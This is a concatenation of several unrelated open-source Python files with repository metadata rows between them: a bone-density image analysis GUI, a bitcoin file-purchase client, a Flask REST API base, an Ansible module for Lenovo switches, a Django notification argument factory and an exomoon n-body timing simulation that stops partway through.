self.imageWin.currLabel.setText("%i / %i" % (self.imageWinIndex+1,len(imageFilenames)))
def showImageWin(self):
self.createImageWin()
self.imagesBMDpercentChange()
self.updateImageWin()
def imagesBMDpercentChange(self):
# Get image arrays and convert to an array of floats
imageFilenames = self.sidePanel.getListOfImages()
images = [ self.imageFiles[str(name.text())] for name in imageFilenames ]
imagesConv = []
for img in images:
image = img.copy()
image[np.where(image==0)] = 1
image = image.astype(np.float)
imagesConv.append(image)
# Calculate percentage change and set with limits -100% to +100%
imagesPercCh = []
imageInitial = imagesConv[0]
for image in imagesConv:
imagePercCh = (image-imageInitial)/imageInitial*100.
imagePercCh[np.where(imagePercCh> 100.)] = 100.
imagePercCh[np.where(imagePercCh<-100.)] = -100.
imagesPercCh.append(imagePercCh)
numImages = len(imagesPercCh)
self.imageWin.imagesRGB = []
for i in xrange(numImages):
image = imagesPercCh[i]
sx,sy = image.shape
imageRGB = image*(255/200.)+(255/2.)
self.imageWin.imagesRGB.append(imageRGB)
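            # Note (added for illustration): the linear map above sends the clipped
            # percentage change [-100, +100] to [0, 255], e.g. -100 -> 0, 0 -> 127.5,
            # +100 -> 255, so the slider threshold in setLookupTable operates on 0-255 values.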
def BMDtoCSVfile(self):
""" Write BMD change to csv file """
fileName = QtGui.QFileDialog.getSaveFileName(None,self.tr("Export to CSV"),QtCore.QDir.currentPath(),self.tr("CSV (*.csv)"))
# Fix for PyQt/PySide compatibility. PyQt returns a QString, whereas PySide returns a tuple (first entry is filename as string)
if isinstance(fileName,types.TupleType): fileName = fileName[0]
if hasattr(QtCore,'QString') and isinstance(fileName, QtCore.QString): fileName = str(fileName)
if not fileName=='':
textFile = open(fileName,'w')
numFrames, numROIs = self.BMDchange.shape
roiNames = self.roiNames
header = "%10s," % 'Time'
header += ((numROIs-1)*'%10s,'+'%10s\n') % tuple(roiNames)
textFile.write(header)
for i in xrange(numFrames):
textFile.write('%10.1f,' % self.timeData[i])
for j in xrange(numROIs):
if j<numROIs-1: fmt = '%10.3f,'
else: fmt = '%10.3f\n'
textFile.write(fmt % self.BMDchange[i,j])
textFile.close()
def showResults(self,):
""" Plots BMD change using matplotlib """
# Create plot window
if self.plotWin==None:
self.plotWin = QtGui.QDialog(self, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint | \
QtCore.Qt.WindowMinimizeButtonHint | QtCore.Qt.WindowMaximizeButtonHint)
self.plotWin.setWindowTitle('BMDanalyse')
self.plotWin.setWindowIcon(self.icons['BMDanalyseIcon'])
self.plotWin.setMinimumSize(600,500)
self.plotWin.resize(self.minimumSize())
# Create Matplotlib widget
self.mplw = MatplotlibWidget(size=(5,6))
self.fig = self.mplw.getFigure()
self.editDataButton = QtGui.QPushButton('Edit plot')
self.exportCSVButton = QtGui.QPushButton('Export data')
self.mplw.toolbar.addWidget(self.editDataButton)
self.mplw.toolbar.addWidget(self.exportCSVButton)
self.editDataButton.clicked.connect(self.showEditBox)
self.exportCSVButton.clicked.connect(self.BMDtoCSVfile)
# Format plot window
self.plotWinLayout = QtGui.QVBoxLayout()
self.plotWinLayout.addWidget(self.mplw)
self.plotWin.setLayout(self.plotWinLayout)
self.createFigure()
self.plotWin.show()
self.mplw.draw()
def createFigure(self):
""" Creates plot of results """
self.ax1 = self.fig.add_subplot(111)
self.ax1.clear()
self.fig.subplots_adjust(bottom=0.15,top=0.85,left=0.15,right=0.925)
numFrames, numROIs = self.BMDchange.shape
t = self.timeData
# Plot data
for i in xrange(numROIs):
roiname = self.roiNames[i]
self.ax1.plot(t,self.BMDchange[:,i],'-o',label=roiname,linewidth=2.0)
kwargs = dict(y=1.05) # Or kwargs = {'y':1.05}
self.ax1.set_title('Change in Bone Mineral Density over time',fontsize=14,fontweight='roman',**kwargs)
self.ax1.set_xlabel('Time',fontsize=10)
self.ax1.set_ylabel('Change in BMD (%)',fontsize=10)
self.ax1.legend(loc=0)
matplotlib.pyplot.setp(self.ax1.get_xmajorticklabels(), fontsize=10)
matplotlib.pyplot.setp(self.ax1.get_ymajorticklabels(), fontsize=10)
matplotlib.pyplot.setp(self.ax1.get_legend().get_texts(),fontsize=10)
self.ax1.grid()
def fillEditBox(self):
rows,cols = self.BMDchange.shape
for i in xrange(rows):
itmValue = '%.2f' % self.timeData[i]
itm = QtGui.QTableWidgetItem(itmValue)
self.tableResults.setItem(i,0,itm)
for j in xrange(cols):
itmValue = '%.2f' % self.BMDchange[i,j]
itm = QtGui.QTableWidgetItem(itmValue)
self.tableResults.setItem(i,j+1,itm)
def showEditBox(self):
self.plotWin.editBox = QtGui.QDialog(self.plotWin, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint)
self.plotWin.editBox.setWindowIcon(self.icons['BMDanalyseIcon'])
self.plotWin.editBox.setWindowTitle('BMDanalyse')
self.plotWin.editBox.setModal(True)
# Add table
layout = QtGui.QVBoxLayout()
layout.setContentsMargins(10,10,10,10)
layout.setSpacing(20)
rows,cols = self.BMDchange.shape
self.tableResults = TableWidget(rows,cols+1,self.plotWin.editBox)
self.tableResults.verticalHeader().setVisible(True)
# Set headers
self.tableResults.setHorizontalHeaderItem(0,QtGui.QTableWidgetItem('Time'))
for i in xrange(cols):
header = QtGui.QTableWidgetItem(self.roiNames[i])
self.tableResults.setHorizontalHeaderItem(i+1,header)
# Add values to table
self.fillEditBox()
# Set layout
layout.addWidget(self.tableResults)
self.buttonsFrame = QtGui.QFrame()
self.buttonsLayout = QtGui.QHBoxLayout()
self.buttonReset = QtGui.QPushButton('Reset')
self.buttonSave = QtGui.QPushButton('Save')
self.buttonClose = QtGui.QPushButton('Cancel')
self.buttonReset.setFixedWidth(50)
self.buttonSave.setFixedWidth(50)
self.buttonClose.setFixedWidth(50)
self.buttonClose.clicked.connect(self.plotWin.editBox.close)
self.buttonSave.clicked.connect(self.updateTableValues)
self.buttonReset.clicked.connect(self.fillEditBox)
self.buttonsLayout.addStretch(1)
self.buttonsLayout.addWidget(self.buttonReset)
self.buttonsLayout.addWidget(self.buttonSave)
self.buttonsLayout.addWidget(self.buttonClose)
self.buttonsLayout.setContentsMargins(0,0,0,0)
self.buttonsFrame.setLayout(self.buttonsLayout)
layout.addWidget(self.buttonsFrame)
self.plotWin.editBox.setLayout(layout)
self.plotWin.editBox.setMaximumSize(layout.sizeHint())
self.plotWin.editBox.show()
def updateTableValues(self):
# Create temporary arrays
timeData = self.timeData.copy()
BMDchange = self.BMDchange.copy()
# Put the values from the tables into the temporary arrays
rows = self.tableResults.rowCount()
cols = self.tableResults.columnCount()
for r in xrange(rows):
for c in xrange(cols):
item = self.tableResults.item(r,c)
itemValue = float(item.text())
if c==0:
timeData[r] = itemValue
else:
BMDchange[r,c-1] = itemValue
# Check that time values are in increasing order. If so, then update arrays
if any(np.diff(timeData)<=0):
self.errorMessage = QtGui.QMessageBox()
self.errorMessage.setWindowIcon(self.icons['BMDanalyseIcon'])
self.errorMessage.setWindowTitle('BMDanalyse')
self.errorMessage.setText('Input error: Time values should be in order of increasing value')
self.errorMessage.setIcon(QtGui.QMessageBox.Warning)
self.errorMessage.open()
else:
self.timeData = timeData
self.BMDchange = BMDchange
self.createFigure()
self.mplw.draw()
self.plotWin.editBox.close()
|
mit
| 8,683,989,055,049,540,000
| 48.940397
| 143
| 0.621192
| false
| 3.744166
| false
| false
| false
|
fredzannarbor/pagekicker-community
|
scripts_python_3/bitcoin/fileclient/fileclient.py
|
1
|
2020
|
#!/usr/bin/env python3
import json
from two1.wallet import Wallet
from two1.bitrequests import BitTransferRequests
# set up bitrequest client for BitTransfer requests
wallet = Wallet()
requests = BitTransferRequests(wallet)
# server address
server_url = 'http://localhost:5000/'
def buy_file():
# get the file listing from the server
response = requests.get(url=server_url+'files')
file_list = json.loads(response.text)
# print the file list to the console
for file in range(len(file_list)):
print(("{}. {}\t{}".format(file+1, file_list[str(file+1)][0], file_list[str(file+1)][1])))
try:
# prompt the user to input the index number of the file to be purchased
        sel = input("Please enter the index of the file that you would like to purchase:")
        # check if the input is a valid key in the file_list dict (JSON keys are strings)
if sel in file_list:
print(('You selected {} in our database'.format(file_list[sel][0])))
# create a 402 request with the server payout address
sel_url = server_url+'buy?selection={0}&payout_address={1}'
answer = requests.get(url=sel_url.format(int(sel), wallet.get_payout_address()), stream=True)
if answer.status_code != 200:
print("Could not make an offchain payment. Please check that you have sufficient buffer.")
else:
# open a file with the same name as the file being purchased and stream the data into it.
filename = file_list[str(sel)][0]
with open(filename, 'wb') as fd:
for chunk in answer.iter_content(4096):
fd.write(chunk)
fd.close()
print('Congratulations, you just purchased a file for bitcoin!')
else:
print("That is an invalid selection.")
except ValueError:
print("That is an invalid input. Only numerical inputs are accepted.")
if __name__ == '__main__':
buy_file()
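# Note (added for illustration): BitTransferRequests is assumed to wrap the HTTP call so
# that a 402 Payment Required response from the seller is paid from the local two1 wallet
# before the file bytes are streamed back; this is an assumption about the two1 library's
# behaviour, not something stated in this script.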
|
apache-2.0
| -9,155,594,795,914,871,000
| 35.727273
| 106
| 0.619307
| false
| 4.04
| false
| false
| false
|
jfillmore/hoops
|
hoops/base.py
|
1
|
9650
|
import copy
import json
import re
import logging
from flask import g, request
from flask.ext.restful import abort
from formencode import Invalid, Schema
from formencode.validators import Validator
from hoops.restful import Resource
from hoops.exc import APIValidationException
from hoops.status import library as status_library
request_logger = logging.getLogger('api.request')
class APIOperation(object):
'''
Used to map API parameter names to database fields. e.g.
field_map = {
(param_name, field_name) = lambda val: val,
...
}
'''
field_map = {}
def __call__(self, *args, **kwargs):
# logging parameters
self.url_params = self.validate_url(**kwargs)
self.params = self.validate_input()
remote_addr = request.remote_addr or 'localhost'
request_method = request.environ.get('REQUEST_METHOD')
path_info = request.environ.get('PATH_INFO')
request_logger.debug(
'Request: %s %s %s %s',
remote_addr, request_method, path_info, unicode(self.params)
)
if hasattr(self, 'setup'):
self.setup(*args, **kwargs)
return self.process_request(*args, **kwargs)
def __init__(self, resource=None, method='get'):
self.resource = resource
@property
def combined_params(self):
params = copy.deepcopy(getattr(self, 'params', {}))
url_params = getattr(self, 'url_params', {})
params.update(url_params)
return params
def _map_fields(self, params):
for (param_name, field_name) in self.field_map:
# ignore params in our map not supplied in the API call
if param_name not in params:
continue
# we'll also change the value accordingly
            func = self.field_map[(param_name, field_name)]
# add the new value back in, removing the old
params[field_name] = func(params[param_name])
del params[param_name]
return params
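    # Example (added for illustration, hypothetical names): with
    #   field_map = {('user_id', 'owner_id'): lambda val: int(val)}
    # a request parameter user_id="7" is stored back into params as params['owner_id'] == 7
    # and the original 'user_id' key is removed.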
def _combine_schema(self, attr_name='schema'):
resource_schema = getattr(self.resource, attr_name, None)
operation_schema = getattr(self, attr_name, None)
# Merge combined schemas, preferring the operation_schema settings and fields
if resource_schema and operation_schema:
schema = copy.deepcopy(operation_schema)
for field in resource_schema.fields:
if not field in schema.fields:
schema.add_field(field, resource_schema.fields[field])
else:
schema = resource_schema or operation_schema
return schema or Schema()
def validate_url(self, *args, **kwargs):
schema = self._combine_schema('url_schema')
if not schema: # pragma: no cover
return {}
try:
return schema.to_python(kwargs)
except Invalid as e:
if e.error_dict:
failures = {}
for field in e.error_dict:
failures[field] = e.error_dict[field].msg
else:
failures = {"unknown": e.msg} # pragma: no cover
raise APIValidationException(status_library.API_INPUT_VALIDATION_FAILED, failures)
def validate_input(self):
schema = self._combine_schema('schema')
try:
params = schema.to_python(self.resource.get_parameters())
except Invalid as e:
if e.error_dict:
failures = {}
for field in e.error_dict:
failures[field] = e.error_dict[field].msg
else:
failures = {"unknown": e.msg} # pragma: no cover
raise APIValidationException(status_library.API_INPUT_VALIDATION_FAILED, failures)
return self._map_fields(params)
def process_request(self, *args, **kwargs):
pass
class APIModelOperation(APIOperation):
@property
def model(self):
return self.resource.model
def get_base_query(self, **kwargs):
'''Obtains the base query for a model-based operation.'''
all_params = kwargs
all_params.update(self.combined_params)
return self.resource.get_base_query(**all_params)
def fetch(self, **kwargs):
item_id = self.combined_params.get(self.resource.object_id_param, None)
id_column = getattr(self, 'id_column', 'id')
column = getattr(self.model, id_column)
item = self.get_base_query(**kwargs).filter(column == item_id).first()
if item is None:
raise status_library.exception(
'API_DATABASE_RESOURCE_NOT_FOUND',
resource=self.resource.model.__tablename__
)
return item
class UnimplementedOperation(APIOperation):
def __call__(self, *args, **kwargs):
raise status_library.API_CODE_NOT_IMPLEMENTED
class APIResource(Resource):
route = None
model = None
read_only = True
object_id_param = None
endpoint = None
create = UnimplementedOperation()
retrieve = UnimplementedOperation()
update = UnimplementedOperation()
remove = UnimplementedOperation()
list = UnimplementedOperation()
#def __repr__(self):
# methods = ['create', 'retrieve', 'update', 'remove', 'list']
# noop = UnimplementedOperation()
# return "<%s [%s: %s]>" % (
# self.__cls__.__name__,
# self.route,
# ', '.join([
# method for method in methods
# if getattr(self, method) is not noop
# ])
# )
@classmethod
def get_parameters(cls):
def purge_oauth_keys(params):
return {k: params[k] for k in filter(lambda item: not re.match(r'^oauth_', item), params)}
from flask import request
if request.method == 'GET':
return purge_oauth_keys(request.args)
elif request.json:
return purge_oauth_keys(request.json)
elif request.form:
return purge_oauth_keys(request.form)
else:
# TODO: is this case even needed?
return purge_oauth_keys(
json.JSONDecoder().decode(request.stream.read())
)
@classmethod
def method(self, method, endpoint=None):
'''
Decorator to bind a callable as the handler for a method.
It sets the resource property on the callable to be the parent resource.
'''
def wrapper(cls, *args, **kwargs):
cls.resource = self
setattr(self, method, cls(resource=self))
return cls
return wrapper
def get(self, **kwargs):
if self.object_id_param in kwargs:
return self.retrieve(**kwargs)
return self.list(**kwargs)
def post(self, **kwargs):
if self.object_id_param in kwargs:
raise status_library.API_RESOURCE_NOT_FOUND # Can't POST with arguments in URL
if self.read_only:
abort(405)
return self.create(**kwargs)
def put(self, **kwargs):
if not self.object_id_param in kwargs:
raise status_library.API_RESOURCE_NOT_FOUND # Can't PUT without arguments (that may have an ID)
if self.read_only:
abort(405)
return self.update(**kwargs)
def delete(self, **kwargs):
if not self.object_id_param in kwargs:
raise status_library.API_RESOURCE_NOT_FOUND # Can't DELETE without arguments (that may have an ID)
if self.read_only:
abort(405)
return self.remove(**kwargs)
@classmethod
def get_base_query(self, **kwargs):
model = self.model
query = model.query
return query
class base_parameter(object):
schema_property = 'schema'
def __init__(self, field, validator, description):
self.field = field
if isinstance(validator, Validator):
self.validator = validator
else:
self.validator = validator()
self.validator.__doc__ = description
def __call__(self, klass):
if not hasattr(klass, self.schema_property):
schema = Schema()
else:
schema = copy.deepcopy(getattr(klass, self.schema_property))
schema.add_field(self.field, self.validator)
setattr(klass, self.schema_property, schema)
return klass
class parameter(base_parameter):
    '''Binds a formencode validator to the schema in either an APIResource or an APIOperation.
If the Schema is not yet present, one is created.
The ``required`` and ``default`` named parameters can be used as shortcuts to modify the
``validator`` as if_missing=default and not_empty=required.
Example:
@parameter("id", validator=formencode.validators.Int(), description="Unique ID of object", required=True, default=None)
'''
def __init__(self, field, validator, description, required=None, default=None):
super(parameter, self).__init__(field, validator, description)
if required is not None:
self.validator.not_empty = required
if default is not None:
self.validator.if_missing = default
class url_parameter(base_parameter):
    '''Binds a formencode validator to the url_schema in either an APIResource or an APIOperation.
If the URL Schema is not yet present, one is created.
All validators added to the schema this way have not_empty=True (as they are mandatory).
Example:
@url_parameter("id", validator=formencode.validators.Int(), description="Unique ID of object")
'''
schema_property = 'url_schema'
|
mit
| 7,188,259,168,814,752,000
| 33.09894
| 123
| 0.607254
| false
| 4.168467
| false
| false
| false
|
tsdmgz/ansible
|
lib/ansible/modules/network/cnos/cnos_conditional_command.py
|
1
|
7325
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to send Conditional CLI commands to Lenovo Switches
# Lenovo Networking
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cnos_conditional_command
author: "Dave Kasberg (@dkasberg)"
short_description: Execute a single command based on condition on devices running Lenovo CNOS
description:
- This module allows you to modify the running configuration of a switch. It provides a way to
execute a single CNOS command on a network device by evaluating the current running configuration
and executing the command only if the specific settings have not been already configured.
The CNOS command is passed as an argument of the method.
This module functions the same as the cnos_command module.
The only exception is that the following inventory variable can be specified
["condition = <flag string>"]
When this inventory variable is specified as the variable of a task, the command is executed for
the network element that matches the flag string. Usually, commands are executed across a group
of network devices. When there is a requirement to skip the execution of the command on one or
more devices, it is recommended to use this module.
This module uses SSH to manage network device configuration.
For more information about this module from Lenovo and customizing it usage for your
use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_conditional_command.html)
version_added: "2.3"
extends_documentation_fragment: cnos
options:
clicommand:
description:
- This specifies the CLI command as an attribute to this method. The command is passed using
double quotes. The variables can be placed directly on to the CLI commands or can be invoked
from the vars directory.
required: true
default: Null
condition:
description:
- If you specify condition=false in the inventory file against any device, the command execution
is skipped for that device.
required: true
default: Null
flag:
description:
- If a task needs to be executed, you have to set the flag the same as it is specified in the
inventory for that device.
required: true
default: Null
'''
EXAMPLES = '''
Tasks : The following are examples of using the module cnos_conditional_command. These are written in the main.yml file of the tasks directory.
---
- name: Applying CLI template on VLAG Tier1 Leaf Switch1
cnos_conditional_command:
host: "{{ inventory_hostname }}"
username: "{{ hostvars[inventory_hostname]['username'] }}"
password: "{{ hostvars[inventory_hostname]['password'] }}"
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
enablePassword: "{{ hostvars[inventory_hostname]['enablePassword'] }}"
outputfile: "./results/test_conditional_command_{{ inventory_hostname }}_output.txt"
condition: "{{ hostvars[inventory_hostname]['condition']}}"
flag: leaf_switch2
command: "spanning-tree mode enable"
enablePassword: "anil"
'''
RETURN = '''
msg:
description: Success or failure message
returned: always
type: string
sample: "Command Applied"
'''
import sys
try:
import paramiko
HAS_PARAMIKO = True
except ImportError:
HAS_PARAMIKO = False
import time
import socket
import array
import json
import time
import re
try:
from ansible.module_utils import cnos
HAS_LIB = True
except:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
def main():
module = AnsibleModule(
argument_spec=dict(
clicommand=dict(required=True),
outputfile=dict(required=True),
condition=dict(required=True),
flag=dict(required=True),
host=dict(required=True),
deviceType=dict(required=True),
username=dict(required=True),
password=dict(required=True, no_log=True),
enablePassword=dict(required=False, no_log=True), ), supports_check_mode=False)
username = module.params['username']
password = module.params['password']
enablePassword = module.params['enablePassword']
condition = module.params['condition']
flag = module.params['flag']
cliCommand = module.params['clicommand']
outputfile = module.params['outputfile']
deviceType = module.params['deviceType']
hostIP = module.params['host']
output = ""
if not HAS_PARAMIKO:
module.fail_json(msg='paramiko is required for this module')
if (condition != flag):
module.exit_json(changed=True, msg="Command Skipped for this value")
return " "
# Create instance of SSHClient object
remote_conn_pre = paramiko.SSHClient()
# Automatically add untrusted hosts (make sure okay for security policy in your environment)
remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# initiate SSH connection with the switch
remote_conn_pre.connect(hostIP, username=username, password=password)
time.sleep(2)
# Use invoke_shell to establish an 'interactive session'
remote_conn = remote_conn_pre.invoke_shell()
time.sleep(2)
    # Enable and enter configure terminal then send command
output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn)
output = output + cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn)
# Make terminal length = 0
output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn)
# Go to config mode
output = output + cnos.waitForDeviceResponse("configure d\n", "(config)#", 2, remote_conn)
# Send the CLi command
output = output + cnos.waitForDeviceResponse(cliCommand + "\n", "(config)#", 2, remote_conn)
# Save it into the file
file = open(outputfile, "a")
file.write(output)
file.close()
# Logic to check when changes occur or not
errorMsg = cnos.checkOutputForError(output)
if(errorMsg is None):
module.exit_json(changed=True, msg="CLI Command executed and results saved in file ")
else:
module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
|
gpl-3.0
| -3,509,905,239,353,352,700
| 36.953368
| 150
| 0.694608
| false
| 4.241459
| true
| false
| false
|
globocom/database-as-a-service
|
dbaas/notification/management/arguments/factory.py
|
1
|
4756
|
class ArgumentsTo(object):
KEY = ''
def __init__(self, args):
self.args = args
def build(self):
raise NotImplementedError
@property
def database_name(self):
return self.args['database'].name
def get_database_arg(self):
return "Database: {}".format(self.database_name)
def get_environment_arg(self):
return "Environment: {}".format(self.args['environment'])
def get_plan_arg(self):
return "Plan: {}".format(self.args['plan'])
def get_project_arg(self):
return "Project: {}".format(self.args['project'])
def get_user_arg(self):
return "User: {}".format(self.args['user'])
def get_clone_arg(self):
return "Clone: {}".format(self.args['clone_name'])
class ArgumentsToCreateDatabase(ArgumentsTo):
KEY = 'notification.tasks.create_database'
def build(self):
return [
self.get_database_arg(),
self.get_environment_arg(),
self.get_project_arg(),
self.get_plan_arg(),
]
@property
def database_name(self):
return self.args['name']
class ArgumentsToResizeDatabase(ArgumentsTo):
KEY = 'notification.tasks.resize_database'
def build(self):
return [
self.get_database_arg(),
"New VM Offering: {}".format(self.args['offering']),
]
class ArgumentsToUpgradeDatabase(ArgumentsTo):
KEY = 'notification.tasks.upgrade_database'
def build(self):
return [
self.get_database_arg(),
"Target plan: {}".format(
self.args['database'].databaseinfra.plan.engine_equivalent_plan
),
]
class ArgumentsToUpgradeDatabasePatch(ArgumentsTo):
KEY = 'notification.tasks.upgrade_database_patch'
def build(self):
return [
self.get_database_arg(),
"New patch: {}".format(self.args['patch']),
]
class ArgumentsToReinstallVM(ArgumentsTo):
KEY = 'notification.tasks.reinstall_vm'
def build(self):
return [
self.get_database_arg(),
"Instance: {}".format(
self.args['instance']
),
]
class ArgumentsToDiskResize(ArgumentsTo):
KEY = 'notification.tasks.database_disk_resize'
def build(self):
return [
self.get_database_arg(),
"New Disk Offering: {}".format(self.args['disk_offering']),
]
class ArgumentsToRestoreSnapshot(ArgumentsTo):
KEY = 'backup.tasks.restore_snapshot'
def build(self):
return [
self.get_database_arg(),
"Description: Restoring to an older version. It will finish soon.",
]
class ArgumentsToDestroyDatabase(ArgumentsTo):
KEY = 'notification.tasks.destroy_database'
def build(self):
return [
self.get_database_arg(),
self.get_user_arg(),
]
class ArgumentsToCloneDatabase(ArgumentsTo):
KEY = 'notification.tasks.clone_database'
def build(self):
return [
self.get_database_arg(),
self.get_clone_arg(),
self.get_environment_arg(),
self.get_plan_arg(),
]
@property
def database_name(self):
return self.args['origin_database'].name
class ArgumentsToAnalyzeDatabases(ArgumentsTo):
KEY = 'dbaas_services.analyzing.tasks.analyze.analyze_databases'
def build(self):
return [
"Description: Analyzing all databases",
]
class ArgumentsToUpgradeMongo24To30(ArgumentsTo):
KEY = 'notification.tasks.upgrade_mongodb_24_to_30'
def build(self):
return [
self.get_database_arg(),
]
class ArgumentsToUnbindAddress(ArgumentsTo):
KEY = 'dbaas_aclapi.tasks.unbind_address_on_database'
def build(self):
return [
"Removing Binds For: {}".format(self.args['database_bind']),
self.get_database_arg(),
]
@property
def database_name(self):
return self.args['database_bind'].database.name
class ArgumentsToBindAddress(ArgumentsTo):
KEY = 'dbaas_aclapi.tasks.bind_address_on_database'
def build(self):
return [
"Creating Binds For: {}".format(self.args['database_bind']),
self.get_database_arg(),
]
@property
def database_name(self):
return self.args['database_bind'].database.name
class ArgumentsToRemoveReadOnlyInstance(ArgumentsTo):
KEY = 'notification.tasks.remove_readonly_instance'
def build(self):
return [
"Removing read only instance from {}".format(self.get_database_arg()),
"Instance: {}".format(self.args['instance'])
]
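# The classes above map a Celery task name (KEY) to a human readable list of
# arguments. A minimal dispatch sketch, assuming the caller only has the task
# name and the raw args dict (the real lookup in this project may differ):
def build_arguments_for(task_name, args):
    for klass in ArgumentsTo.__subclasses__():
        if klass.KEY == task_name:
            return klass(args).build()
    return []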
|
bsd-3-clause
| 1,724,527,907,496,791,300
| 24.031579
| 82
| 0.597351
| false
| 4.05802
| false
| false
| false
|
hippke/TTV-TDV-exomoons
|
create_figures/system_20.py
|
1
|
7712
|
"""n-body simulator to derive TDV+TTV diagrams of planet-moon configurations.
Credit for part of the source is given to
https://github.com/akuchling/50-examples/blob/master/gravity.rst
Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License
"""
import numpy
import math
import matplotlib.pylab as plt
from modified_turtle import Turtle
from phys_const import *
class Body(Turtle):
"""Subclass of Turtle representing a gravitationally-acting body"""
name = 'Body'
vx = vy = 0.0 # velocities in m/s
px = py = 0.0 # positions in m
def attraction(self, other):
"""(Body): (fx, fy) Returns the force exerted upon this body by the other body"""
# Distance of the other body
sx, sy = self.px, self.py
ox, oy = other.px, other.py
dx = (ox-sx)
dy = (oy-sy)
d = math.sqrt(dx**2 + dy**2)
# Force f and direction to the body
f = G * self.mass * other.mass / (d**2)
theta = math.atan2(dy, dx)
# direction of the force
fx = math.cos(theta) * f
fy = math.sin(theta) * f
return fx, fy
def loop(bodies, orbit_duration):
"""([Body]) Loops and updates the positions of all the provided bodies"""
# Calculate the duration of our simulation: One full orbit of the outer moon
seconds_per_day = 24*60*60
timesteps_per_day = 1000
timestep = seconds_per_day / timesteps_per_day
total_steps = int(orbit_duration / 3600 / 24 * timesteps_per_day)
#print total_steps, orbit_duration / 24 / 60 / 60
for body in bodies:
body.penup()
body.hideturtle()
for step in range(total_steps):
for body in bodies:
if body.name == 'planet':
# Add current position and velocity to our list
tdv_list.append(body.vx)
ttv_list.append(body.px)
force = {}
for body in bodies:
# Add up all of the forces exerted on 'body'
total_fx = total_fy = 0.0
for other in bodies:
# Don't calculate the body's attraction to itself
if body is other:
continue
fx, fy = body.attraction(other)
total_fx += fx
total_fy += fy
# Record the total force exerted
force[body] = (total_fx, total_fy)
# Update velocities based upon on the force
for body in bodies:
fx, fy = force[body]
body.vx += fx / body.mass * timestep
body.vy += fy / body.mass * timestep
# Update positions
body.px += body.vx * timestep
body.py += body.vy * timestep
#body.goto(body.px*SCALE, body.py*SCALE)
#body.dot(3)
def run_sim(R_star, transit_duration, bodies):
"""Run 3-body sim and convert results to TTV + TDV values in [minutes]"""
# Run 3-body sim for one full orbit of the outermost moon
loop(bodies, orbit_duration)
# Move resulting data from lists to numpy arrays
ttv_array = numpy.array([])
ttv_array = ttv_list
tdv_array = numpy.array([])
tdv_array = tdv_list
# Zeropoint correction
middle_point = numpy.amin(ttv_array) + numpy.amax(ttv_array)
ttv_array = numpy.subtract(ttv_array, 0.5 * middle_point)
ttv_array = numpy.divide(ttv_array, 1000) # km/s
# Compensate for barycenter offset of planet at start of simulation:
planet.px = 0.5 * (gravity_firstmoon + gravity_secondmoon)
stretch_factor = 1 / ((planet.px / 1000) / numpy.amax(ttv_array))
ttv_array = numpy.divide(ttv_array, stretch_factor)
# Convert to time units, TTV
ttv_array = numpy.divide(ttv_array, R_star)
ttv_array = numpy.multiply(ttv_array, transit_duration * 60 * 24) # minutes
# Convert to time units, TDV
oldspeed = (2 * R_star / transit_duration) * 1000 / 24 / 60 / 60 # m/sec
newspeed = oldspeed - numpy.amax(tdv_array)
difference = (transit_duration - (transit_duration * newspeed / oldspeed)) * 24 * 60
conversion_factor = difference / numpy.amax(tdv_array)
tdv_array = numpy.multiply(tdv_array, conversion_factor)
return ttv_array, tdv_array
"""Main routine"""
# Set variables and constants. Do not change these!
G = 6.67428e-11 # Gravitational constant G
SCALE = 5e-07 # [px/m] Only needed for plotting during nbody-sim
tdv_list = []
ttv_list = []
R_star = 6.96 * 10**5 # [km], solar radius
transit_duration = (2*pi/sqrt(G*(M_sun+M_jup)/a_jup**3)*R_sun/(pi*a_jup)*sqrt((1+R_jup/R_sun)**2))/60/60/24 # transit duration without a moon, Eq. (C1) Kipping (2009b, MNRAS), for q = 0
print transit_duration
planet = Body()
planet.name = 'planet'
planet.mass = M_jup
#semimajor_axis = 1. * AU #[m]
semimajor_axis = a_jup
stellar_mass = M_sun
radius_hill = semimajor_axis * (planet.mass / (3 * (stellar_mass))) ** (1./3)
# Define parameters
firstmoon = Body()
firstmoon.mass = M_gan
firstmoon.px = 0.4218 * 10**9
secondmoon = Body()
secondmoon.mass = M_gan
secondmoon.px = 0.48945554 * 10**9
thirdmoon = Body()
thirdmoon.mass = M_gan
thirdmoon.px = 0.59293316 * 10**9
fourthmoon = Body()
fourthmoon.mass = M_gan
fourthmoon.px = 1.23335068 * 10**9
# Calculate start velocities
firstmoon.vy = math.sqrt(G * planet.mass * (2 / firstmoon.px - 1 / firstmoon.px))
secondmoon.vy = math.sqrt(G * planet.mass * (2 / secondmoon.px - 1 / secondmoon.px))
thirdmoon.vy = math.sqrt(G * planet.mass * (2 / thirdmoon.px - 1 / thirdmoon.px))
fourthmoon.vy = math.sqrt(G * planet.mass * (2 / fourthmoon.px - 1 / fourthmoon.px))
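# Note on the start velocities above: each expression is the vis-viva equation
# v = sqrt(G*M*(2/r - 1/a)) written with a = r (circular orbit), so it reduces
# to v = sqrt(G * planet.mass / px).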
planet.vy = (-secondmoon.vy * secondmoon.mass - firstmoon.vy * firstmoon.mass) / planet.mass
# Calculate planet displacement. This holds for circular orbits
